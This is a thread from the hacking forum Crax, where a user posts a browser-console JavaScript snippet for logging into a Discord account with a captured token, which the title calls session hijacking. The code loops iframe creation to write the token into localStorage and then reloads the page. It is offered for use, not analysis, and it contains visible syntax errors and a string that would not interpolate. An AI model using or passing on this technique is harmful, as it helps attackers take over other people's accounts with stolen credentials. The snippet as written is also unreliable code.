Use Discord Token To Log In for Session Hijacking | General Hacking | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

Use Discord Token To Log In for Session Hijacking

Use Discord Token To Log In for Session Hijacking

LV
1
 

Chismoso

Member
Joined
Sep 9, 2023
Threads
10
Likes
4
Awards
4
Credits
1,386©
Cash
0$
This allows a user to use a discord token in the browser inspector console to access the account.

Code:
place this let token = "your token";

function login(token) {
    setInterval(() => {
      document.body.appendChild(document.createElement iframe).contentWindow.localStorage.token = "${token}"
    }, 50);
    setTimeout(() => {
      location.reload();
    }, 2500);
  }

login(token);
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Similar threads

Top Bottom